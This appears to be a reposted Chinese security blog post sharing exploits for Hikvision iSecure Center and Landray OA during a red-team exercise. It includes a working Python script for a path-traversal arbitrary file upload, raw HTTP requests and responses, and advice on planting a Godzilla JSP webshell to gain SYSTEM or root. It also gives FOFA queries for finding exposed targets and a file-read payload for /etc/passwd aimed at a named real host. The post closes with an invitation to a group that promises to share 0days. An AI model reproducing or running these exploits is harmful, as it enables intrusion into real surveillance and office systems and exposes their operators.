国护0day漏洞消息同步

admin 2023年8月10日01:11:28评论118 views字数 4055阅读13分31秒阅读模式

国护0day漏洞消息同步

免责声明

月落星沉研究室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他违法行为!!!

国护0day漏洞消息同步

国护0day漏洞消息同步

2. 漏洞描述

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台存在任意文件上传漏洞
3. 影响版本

HIKVISION iSecure Center综合安防管理平台,在野。
4. fofa查询语句

icon_hash=“-808437027”
app=“HIKVISION-iSecure-Center”

5. 漏洞复现

EXP/POC:payload.py 脚本 走127.0.0.1:8080 代理,方便burpsuit抓包。

#!usr/bin/env python# *-* coding:utf-8 *-*import sysimport requestsimport stringimport randomimport urllib3urllib3.disable_warnings()
proxies = { 'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080', #127.0.0.1:8080 代理,方便burpsuit抓包}
def run(arg): try: flag=''.join(random.choices(string.ascii_uppercase + string.digits, k = 9)) filename=''.join(random.choices(string.ascii_uppercase + string.digits, k = 10)) vuln_url=arg+"center/api/files;.js" headers={'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)', 'Accept': '*/*', 'Content-Type': 'application/x-www-form-urlencoded'} file = {'file': (f'../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{filename}.txt', flag, 'application/octet-stream')} r = requests.post(vuln_url, files=file, timeout=15, verify=False, proxies=proxies) if r.status_code==200 and "webapps/clusterMgr" in r.text:
payload=f"clusterMgr/{filename}.txt;.js" url=arg+payload r2 = requests.get(url, timeout=15, verify=False, proxies=proxies) if r2.status_code==200 and flag in r2.text:
print('33[1;31;40m') print(arg+f":存在海康威视isecure center 综合安防管理平台存在任意文件上传漏洞nshell地址:{url}") print('33[0m')


else: print(arg+":不存在漏洞") except: print(arg+":不存在漏洞")

if __name__ == '__main__': url=sys.argv[1]    run(url)

6. burpsuit抓包分析

burpsuit 127.0.0.1:8080抓包,抓取post 包一个,get 请求包一个。
payload:请求数据包

POST /center/api/files;.js HTTP/1.1Host: x.x.x.xUser-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Length: 258Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4
--e54e7e5834c8c50e92189959fe7227a4Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt"Content-Type: application/octet-stream
9YPQ3I3ZS--e54e7e5834c8c50e92189959fe7227a4--

payload的返回数据包。

HTTP/1.1 200 Server: openresty/1.13.6.2Date: Fri, 14 Jul 2023 04:35:23 GMTContent-Type: application/json;charset=UTF-8Content-Length: 335Connection: closeSet-Cookie: JSESSIONID=0A235873FB1C02C345345C0D36A4C709; Path=/center; HttpOnlyContent-Language: en_USCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Content-Disposition: inline;filename=f.txt
{"code":"0","data":{"filename":"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt","link":"http://10.201.0.18:8001/download1/center_faq/resource/985c3cfb-6820-4318-907a-bf82c5a8ef49/../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt","id":"985c3cfb-6820-4318-907a-bf82c5a8ef49"},"msg":""}

访问漏洞链接:https://x.x.x.x/clusterMgr/2BT5AV96QW.txt;.js ,查看是否上传成功。

因为Hikvision平台使用的中间件为tomcat,修改报文和文件名,所以实现上传哥斯拉生成jsp。
宿主服务器windows和linux都可使用。windows 拿到的账户是system账户,linux为root。
Hikvison账户管理密码的后渗透操作:海康威视综合安防后渗透利用技巧
7. 修复措施

联系Hikvision厂商,更新版本。

国护0day漏洞消息同步

1.漏洞描述

蓝凌软件全称深圳市蓝凌软件股份有限公司,于2001年在深圳科技园成立。蓝凌是国内知名的大平台OA服务商和国内领先的知识管理解决方案提供商,是专业从事组织的知识化咨询、软件研发、实施、技术服务的国家级高新技术企业,近期Landray-OA系统被爆出存任意文件读取漏洞和后台rce

CVE编号:
CNNVD编号:
CNVD编号:CNVD-2021-28277
2.fofa查询语句

app=“Landray-OA系统”

国护0day漏洞消息同步

3.漏洞复现

漏洞链接:http://www.ynjd.cn:801/sys/ui/extend/varkind/custom.jsp
漏洞数据包:

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1Host: www.ynjd.cn:801User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: */*Connection: Keep-AliveContent-Length: 42Content-Type: application/x-www-form-urlencodedvar={"body":{"file":"file:///etc/passwd"}}

国护0day漏洞消息同步

4.整改意见

建议使用蓝凌OA的系统更新系统至最新版本,附录地址:https://www.landray.com.cn/

ps:以下都是0day和1day级别,暂时未公开poc等细节

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

     国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

国护0day漏洞消息同步

手头没有几个0day也想混网安圈?苦苦寻找没有合适的技战法?护网值守时摸鱼无聊?

为解决这些问题,本团队创建内部群 护网日报群 吐槽分享护网时的各种状况和经验,互相交流技战法(ps:里面还有红队大佬挖出的0day漏洞分享哦),内部群互相学习交流,名额有限大家赶快加入!!

 添加作者微信拉大家进群:l09079280l

国护0day漏洞消息同步

国护0day漏洞消息同步

原文始发于微信公众号(月落安全):国护0day漏洞消息同步

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月10日01:11:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   国护0day漏洞消息同步http://cn-sec.com/archives/1945738.html

发表评论

匿名网友 填写信息